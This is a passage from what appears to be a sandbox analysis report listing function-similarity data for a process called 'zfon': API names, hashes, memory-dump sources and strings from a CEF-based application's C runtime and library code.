                                                                                                • API ID: Name::operator+Replicator::operator[]
                                                                                                • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                • API String ID: 1405650943-2211150622
                                                                                                • Opcode ID: bbc19fe8acb2af624d1aa6c3fda2c2c3f4ee9ad2dfe93a969b1fef282e9c5a3b
                                                                                                • Instruction ID: 4c1cdd2ece87175a10374ff9aec53438316d6778dbd08b89cfac271e62e23f7a
                                                                                                • Opcode Fuzzy Hash: bbc19fe8acb2af624d1aa6c3fda2c2c3f4ee9ad2dfe93a969b1fef282e9c5a3b
                                                                                                • Instruction Fuzzy Hash: 2A4106B2E08B46ADF7118BACD8602BCB7A1BB08788F984931DB4C167A4DF7CE544C740
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: char $int $long $short $unsigned
                                                                                                • API String ID: 2943138195-3894466517
                                                                                                • Opcode ID: d543906abe76930c5ae4e84494e2eda85b894ff74c2d28b68c5523291a1a48d2
                                                                                                • Instruction ID: fef3c30fa1e94eeed08bfc1d75c2466910526d5e808eaee25e41f75c23eea019
                                                                                                • Opcode Fuzzy Hash: d543906abe76930c5ae4e84494e2eda85b894ff74c2d28b68c5523291a1a48d2
                                                                                                • Instruction Fuzzy Hash: 66311872B18A559DEB159FACD8601BC77A4FB09B88F448136DB4C27B98DE3CE544C710
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: b907666272c45d9d6ff080cd8075b49ea0bc4e31f06a12cac75e2cf208154752
                                                                                                • Instruction ID: 5cf5bf708bc17c66b19be321a88a27ddae350fd7e883f3471fbbe9fcdef8d512
                                                                                                • Opcode Fuzzy Hash: b907666272c45d9d6ff080cd8075b49ea0bc4e31f06a12cac75e2cf208154752
                                                                                                • Instruction Fuzzy Hash: 2EF01412A1858991EB90FF64CC521FE5A31AB58744FC41E31E62D450EB9F18D55683B1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: 67324ca78e9feae9fa31f44ee5c65d68ce8e15fd10505976dea262e3b35507a2
                                                                                                • Instruction ID: a97b73e38923a6e1a596298fb3437f64756dd24619be371b58aac92a828af398
                                                                                                • Opcode Fuzzy Hash: 67324ca78e9feae9fa31f44ee5c65d68ce8e15fd10505976dea262e3b35507a2
                                                                                                • Instruction Fuzzy Hash: 25F07A61A14947D2EF48AF20FD586B86770FB98B6AF842031C51E450B8DE2CD58EC3B0
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96F8B20: new.LIBCMT ref: 00007FF7F96F8B37
                                                                                                  • Part of subcall function 00007FF7F96F8B20: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8B46
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F34F4
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F3694
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F3860
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F3870
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F3880
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F388D
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                Similarity
                                                                                                • API ID: malloc
                                                                                                Similarity
                                                                                                • API ID: fgetc
                                                                                                Similarity
                                                                                                • API ID: Name::operator+$NameName::
                                                                                                Similarity
                                                                                                • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                Similarity
                                                                                                • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                Similarity
                                                                                                • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                Similarity
                                                                                                • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                                Similarity
                                                                                                • API ID: __acrt_iob_funccalloc$Mtx_unlock_beginthreadexabortfputcfputs
                                                                                                Similarity
                                                                                                • API ID: Once$ExecuteInit__crtterminate$ErrorExceptionLastSystem_errorSystem_error::_Throw_invalid_parameter_noinfo_noreturnstd::_
                                                                                                • String ID:
                                                                                                • API String ID: 3077141932-0
                                                                                                • Opcode ID: 292ba9b08f1b456e8eb1e10f3c91b04e86b57f13cec82466bb27a72e0fb057f3
                                                                                                • Instruction ID: cbece2283d21a62c2ce779dcde4f3c00f2e38f8e67f1e1f76814cec13ddff301
                                                                                                • Opcode Fuzzy Hash: 292ba9b08f1b456e8eb1e10f3c91b04e86b57f13cec82466bb27a72e0fb057f3
                                                                                                • Instruction Fuzzy Hash: 4D21E761A1C7D792EB109F2CE8000AA63A0FF997D4F505231EB9D43699EF3CD542D700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrow__std_exception_copy$std::invalid_argument::invalid_argument$std::regex_error::regex_error
                                                                                                • String ID:
                                                                                                • API String ID: 2225372811-0
                                                                                                • Opcode ID: 579caac49531870bd7b2df6b8c7ac96cef54dbc44b83102e448678832d7dfad5
                                                                                                • Instruction ID: a8a75762125abda393290a639645a6660667a7d19727c9e6faca4ef376340efe
                                                                                                • Opcode Fuzzy Hash: 579caac49531870bd7b2df6b8c7ac96cef54dbc44b83102e448678832d7dfad5
                                                                                                • Instruction Fuzzy Hash: C2F01262A184C2A6D910AB18D4650AE6330BB943C4F904172E39E46AA6ED6DD70DDB00
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __pctype_func$___lc_codepage_func___lc_locale_name_func_wcsdupcalloc
                                                                                                • String ID:
                                                                                                • API String ID: 490008815-0
                                                                                                • Opcode ID: c26570a5175e310c7c67cec82136f633dba3ba5588f44644c2c5e5ceca30bf29
                                                                                                • Instruction ID: bb07ddda5ffd64a2e4097d1792c751823cb22aa218623100952729b7c265e250
                                                                                                • Opcode Fuzzy Hash: c26570a5175e310c7c67cec82136f633dba3ba5588f44644c2c5e5ceca30bf29
                                                                                                • Instruction Fuzzy Hash: E121EA26E08B8582E7059F3CD5052B827A0FBA9B98F15A624CF9C16222EF79E5D5D340
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 88f2ef690c4a8c45f9e59a1200a3e63dedbb3740fc12a1e5506eac693a5bd548
                                                                                                • Instruction ID: 568ca550da720589f3ecaf97bbf2b24a009a57474f64b2119c28780350080ca2
                                                                                                • Opcode Fuzzy Hash: 88f2ef690c4a8c45f9e59a1200a3e63dedbb3740fc12a1e5506eac693a5bd548
                                                                                                • Instruction Fuzzy Hash: A5F04B70F0A60390EF48BF20A949378A1B1AF987B1FC00734C13D016ECEE1D649642B5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 5b714251bbdd11423a55c0776489f6b684c1a57d624a24fc72f26bda6c2bdede
                                                                                                • Instruction ID: 4f831c2bd9fa955e1f7251ee3f0c2cef438251d239dc62178832d6be681d3d52
                                                                                                • Opcode Fuzzy Hash: 5b714251bbdd11423a55c0776489f6b684c1a57d624a24fc72f26bda6c2bdede
                                                                                                • Instruction Fuzzy Hash: 8EF0FBA0E1670251FF68BB21A94A37991B1EF597F1F804774C53E416DCED1C258646B0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 933c6945ac0c1734e21877da7a05e15318510cce0e034cb2454857b8da2631b6
                                                                                                • Instruction ID: beaa5c96107deb05d8c7235e7f234368299ba1700c4cfb909ac985803cd20ffe
                                                                                                • Opcode Fuzzy Hash: 933c6945ac0c1734e21877da7a05e15318510cce0e034cb2454857b8da2631b6
                                                                                                • Instruction Fuzzy Hash: 9F014460E09B02A2EF58BB62B949338A1B0AF497F1F800635C17D812DCED1C65C98672
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 22008d081fcb802cd2ca1249ed3b68a01df3c254b4f916e0378cb5af36a1206e
                                                                                                • Instruction ID: 546d29ddfbabc25d81a19a85dff4b8d3d20190cd900e847e743dc7e5de3829bb
                                                                                                • Opcode Fuzzy Hash: 22008d081fcb802cd2ca1249ed3b68a01df3c254b4f916e0378cb5af36a1206e
                                                                                                • Instruction Fuzzy Hash: 78014F70F1670291EE68BF64AD4A378A1F0DF587F1F840674C53E012ECEE5C648686B0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: df32d05ea09cbf875a063a74e2004c604787f01abbfeaa2e241b8ecd85f65cee
                                                                                                • Instruction ID: 1a6a1f56af672c94d29b9c6dad127b0a590bf974ca132a8fbed9fe1087550604
                                                                                                • Opcode Fuzzy Hash: df32d05ea09cbf875a063a74e2004c604787f01abbfeaa2e241b8ecd85f65cee
                                                                                                • Instruction Fuzzy Hash: D401FF70F06B0691EE99FB64AD49268A1F0AF597F1F800635C53D016ECEE5C648682B0
                                                                                                APIs
                                                                                                • ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96F4224), ref: 00007FF7F96F987F
                                                                                                • ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96F4224), ref: 00007FF7F96F98A0
                                                                                                • new.LIBCMT ref: 00007FF7F96F98AA
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96F4224), ref: 00007FF7F96F98B7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 299676f5ed099db6b6025b468dfcc04c54bdedd21b94257f90a8872ff9d81810
                                                                                                • Instruction ID: d686312a463ba2d262cb6f79fdd3693864c6c907c60f60e53255ffde148039ef
                                                                                                • Opcode Fuzzy Hash: 299676f5ed099db6b6025b468dfcc04c54bdedd21b94257f90a8872ff9d81810
                                                                                                • Instruction Fuzzy Hash: EC011260F0960261FF58FF66B949238A1B59F487B5FC04A35C63E816ECFD1C658682B2
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                APIs
                                                                                                • memchr.VCRUNTIME140 ref: 00007FF8B9115222
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B91152FE
                                                                                                  • Part of subcall function 00007FF8B912CAC4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B912CADE
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B911535B
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B91153F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$mallocmemchr
                                                                                                • String ID: 0123456789-
                                                                                                • API String ID: 1035304070-3850129594
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2889003569-2084237596
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2889003569-2084237596
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                • API String ID: 2943138195-757766384
                                                                                                APIs
                                                                                                • __except_validate_context_record.LIBVCRUNTIME ref: 00007FF8BFAD20F2
                                                                                                  • Part of subcall function 00007FF8BFAD3524: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FF8BFAD1222), ref: 00007FF8BFAD3564
                                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFAD2247
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$__except_validate_context_record
                                                                                                • String ID: $csm$csm
                                                                                                • API String ID: 3000080923-1512788406
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 0-1866435925
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2889003569-2084237596
                                                                                                APIs
                                                                                                • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E7622), ref: 00007FF8B90E8025
                                                                                                • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E7622), ref: 00007FF8B90E8039
                                                                                                • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E7622), ref: 00007FF8B90E80A5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: iswctype
                                                                                                • String ID: (
                                                                                                • API String ID: 304682654-3887548279
                                                                                                APIs
                                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E5B42), ref: 00007FF8B90E6732
                                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E5B42), ref: 00007FF8B90E6743
                                                                                                • isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E5B42), ref: 00007FF8B90E679C
                                                                                                • isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E5B42), ref: 00007FF8B90E684C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: isspace$isalnumisxdigit
                                                                                                • String ID: (
                                                                                                • API String ID: 3355161242-3887548279
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileHeader
                                                                                                • String ID: MOC$RCC$csm$csm
                                                                                                • API String ID: 104395404-1441736206
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F9703550: cef_string_map_alloc.LIBCEF(?,?,?,?,00007FF7F96E7544), ref: 00007FF7F9703554
                                                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z.MSVCP140 ref: 00007FF7F96EE88A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@cef_string_map_alloc
                                                                                                • String ID: callback_id=$ name=$[CallJsFunctionInUiThread] calling ui thread $c:\projects\hydra\main\code\contrib\contrib\scene\src\source\cef\client_handler_impl.cpp
                                                                                                • API String ID: 3922544612-2379361043
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: setlocale$ExceptionThrowstd::invalid_argument::invalid_argument
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 1847144839-1405518554
                                                                                                APIs
                                                                                                Strings
                                                                                                • SceneProxy/2.1.0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36, xrefs: 00007FF7F96E1076
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _onexitfreememcpymemmove
                                                                                                • String ID: SceneProxy/2.1.0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
                                                                                                • API String ID: 3647039986-2186856816
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2003779279-1866435925
                                                                                                APIs
                                                                                                • strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B90F2D92
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F2DA5
                                                                                                • strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B90F2DBA
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B90F3110
